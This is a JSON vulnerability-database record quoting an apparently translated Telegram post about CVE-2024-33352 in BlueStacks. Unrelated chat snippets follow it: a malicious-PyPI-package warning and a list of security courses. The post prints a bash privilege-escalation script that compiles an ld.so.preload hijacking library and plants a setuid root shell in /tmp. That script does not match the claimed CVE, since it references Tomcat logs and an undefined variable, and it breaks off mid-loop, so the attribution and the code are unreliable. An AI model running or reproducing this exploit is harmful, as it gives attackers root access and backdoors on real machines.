{"uuid": "38ae3309-c519-4649-abb4-0515d15de5ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/1611", "content": "The security vulnerability CVE-2024-33352 affects BlueStacks, a popular Android emulator used to run Android apps on personal computers. This vulnerability was discovered by the researcher mmiszczyk, and a proof of concept (PoC) was published on GitHub. 
The vulnerability concerns privilege escalation by planting a malicious program in the BlueStacks virtual machine (VM), which allows an attacker to obtain root privileges on the target system.\n\n### Technical details\n\nThe vulnerability relies on using specific BlueStacks features to plant malware in the virtual machine, which leads to privilege escalation. 
This can allow an attacker to take full control of the target system.\n\n### How exploitation works\n\nTo take advantage of this vulnerability, the attacker needs access to the target system to run the exploit script. The researcher provided a proof of concept (PoC), which shows the steps needed to carry out the attack.\n\n#### Execution steps\n\n1. Download and use the script: The proof-of-concept script can be downloaded from [here](https://github.com/mmiszczyk/CVE-2024-33352/blob/main/exploit.sh).\n2. 
Run the script: The script must be run on the target system with normal user privileges. The script sets up the exploitation environment by planting a malicious program in the virtual machine.\n\n### Technical explanation of the script\n\n```bash\n#!/bin/bash\n# BlueStacks Privilege Escalation Exploit\n# CVE-2024-33352\n\n# Set up the files needed to plant the malicious program\nBACKDOORSH=\"/bin/bash\"\nBACKDOORPATH=\"/tmp/bluestacksrootsh\"\nPRIVESCLIB=\"/tmp/privesclib.so\"\nPRIVESCSRC=\"/tmp/privesclib.c\"\n\nfunction cleanexit {\n # Clean up the files when finished\n echo -e \"\\n[+] Cleaning up...\"\n rm -f $PRIVESCSRC\n rm -f $PRIVESCLIB\n rm -f $TOMCATLOG\n touch $TOMCATLOG\n if [ -f /etc/ld.so.preload ]; then\n echo -n > /etc/ld.so.preload 2>/dev/null\n fi\n echo -e \"\\n[+] Job done. 
Exiting with code $1 \\n\"\n exit $1\n}\n\n# Set up the malicious program\ncat <<_solibeof_>$PRIVESCSRC\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \nuid_t geteuid(void) {\n static uid_t (*old_geteuid)();\n old_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\n if ( old_geteuid() == 0 ) {\n chown(\"$BACKDOORPATH\", 0, 0);\n chmod(\"$BACKDOORPATH\", 04777);\n unlink(\"/etc/ld.so.preload\");\n }\n return old_geteuid();\n}\n_solibeof_\ngcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\nif [ $? -ne 0 ]; then\n echo -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\"\n cleanexit 2;\nfi\n\n# Set up the backdoor/low-privilege shell\ncp $BACKDOORSH $BACKDOORPATH\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\nls -l $BACKDOORPATH\"\n\n# Set up the symlink to the ld.so.preload file\nrm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG\nif [ $? -ne 0 ]; then\n echo -e \"\\n[!] 
Couldn't remove the $TOMCATLOG file or create a symlink.\"\n cleanexit 3\nfi\necho -e \"\\n[+] Symlink created at: \\nls -l $TOMCATLOG\"\n\n# Wait until Tomcat re-opens the logs\necho -ne \"\\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\"\necho -e \"\\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\"\nwhile :; do\n sleep 0.1\n if [ -f /etc/ld.so.preload ]; then\n echo $PRIVESCLIB > /etc/ld.so.preload\n break;\n```\n\n### How to protect\n\nTo protect the system from this exploit, it is recommended to update BlueStacks to the latest version and to make sure all available security patches are applied. 
You should also always take care to monitor systems and unusual activity.\n\n### Sources\n\n- [mmiszczyk/CVE-2024-33352 on GitHub](https://github.com/mmiszczyk/CVE-2024-33352)\n- [Proof of concept on GitHub](https://github.com/mmiszczyk/CVE-2024-33352/blob/main/exploit.sh)\n\nALSED404:\nBeware of the PyPI package \"lr-utils-lib\"; it is a new threat to macOS users!\n\nThis package steals Google Cloud credentials, posing a serious risk to both individual developers and organizations.\n\nRead the details: https://thehackernews.com/2024/07/malicious-pypi-package-targets-macos-to.html\n\nSQL\ud83d\udc7d:\nHere are some courses that focus on security vulnerabilities and how to find and fix them, 
along with some important resources in this field:\n\n### Courses in Arabic:\n\n1. Ethical hacking and security vulnerability discovery course:\n   - Platform: Elzero Academy\n   - The course covers how to discover security vulnerabilities and test the security of systems.\n   - [Course link](https://www.elzero.org/courses/ethical-hacking/)", "creation_timestamp": "2024-12-13T19:00:22.000000Z"}